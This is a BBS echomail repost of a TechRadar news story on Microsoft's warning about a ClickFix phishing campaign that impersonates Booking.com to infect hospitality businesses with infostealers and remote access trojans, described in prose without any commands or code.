TZUTC: -0500   
   MSGID: 455.consprcy@1:2320/105 2c3979f0   
   PID: Synchronet 3.20a-Linux master/acc19483f Apr 26 202 GCC 12.2.0   
   TID: SBBSecho 3.20-Linux master/acc19483f Apr 26 2024 23:04 GCC 12.2.0   
   BBSID: CAPCITY2   
   CHRS: ASCII 1   
   Microsoft warns about a new phishing campaign impersonating Booking.com   
      
   Date:   
   Thu, 13 Mar 2025 15:00:00 +0000   
      
   Description:   
   The goal of the campaign is to steal peoples payment and personal data.   
      
   FULL STORY   
      
   Hotels, resorts, and other businesses in the hospitality industry, are being   
   targeted with a sophisticated ClickFix phishing campaign that impersonates   
   Booking.com.    
      
   A new report from Microsoft Threat Intelligence claims that the phishing   
   campaign is rapidly evolving, and targeting businesses worldwide.    
      
   The goal of the campaign is to steal peoples payment and personal data, which   
   could lead to wire fraud, and reputational harm for victim organizations.   
      
   Storm-1865    
      
   First, the attackers create a Booking.com-themed notification email,   
   discussing things like guest reviews, or account verifications. Businesses   
   that dont spot the scam are then redirected to a fake CAPTCHA puzzle, and if   
   they solve it, are prompted with an error message. That fake error message   
   also comes with a solution, which includes copying a command, and   
   pasting/running it in the Run program.    
      
   Instead of fixing the problem, running the program downloads one of multiple   
   malware strains being used in this campaign: XWorm, Lumma Stealer, or   
   VenomRAT. These are different types of malware with different features.    
      
   While VenomRAT, for example, is a remote access trojan that grants attackers   
   unabated access to victim devices, Lumma is an infostealer that grabs login   
   credentials and other secrets stored in the web browser , and elsewhere on    
   the device.    
      
   Microsoft attributed the campaign to a threat actor it tracks as Storm-1865,    
   a group with no previous record. The campaign apparently started in December   
   2024, and there is no information on how many companies - if any - fell prey   
   to it.    
      
   ClickFix fraud has gotten more popular lately, and TechRadar Pro has reported   
   on it on numerous occasions this year already. It is an evolution of the old   
   IT technician scam, in which a victim is served a popup impersonating a   
   reputable company saying their computer is broken/infected.    
      
   The popup shares a phone number that the victim can call, to talk to an IT   
   technician and sort the problem out. The technician ends up installing   
   malware.    
      
   While phone scams are still very much alive, the ClickFix campaign focuses   
   mostly on the victim doing most of the work, installing the malware through a   
   less-obvious process (pasting a command in Run).   
      
   ======================================================================   
   Link to news story:   
   https://www.techradar.com/pro/security/microsoft-warns-about-a-new-phishing-ca   
   mpaign-impersonating-booking   
      
   $$   
   --- SBBSecho 3.20-Linux   
    * Origin: capitolcityonline.net * Telnet/SSH:2022/HTTP (1:2320/105)   
   SEEN-BY: 105/81 106/201 128/187 129/305 153/7715 154/110 218/700 226/30   
   SEEN-BY: 227/114 229/110 111 114 206 300 307 317 400 426 428 470 664   
   SEEN-BY: 229/700 705 266/512 291/111 320/219 322/757 342/200 396/45   
   SEEN-BY: 460/58 712/848 902/26 2320/0 105 3634/12 5075/35   
   PATH: 2320/105 229/426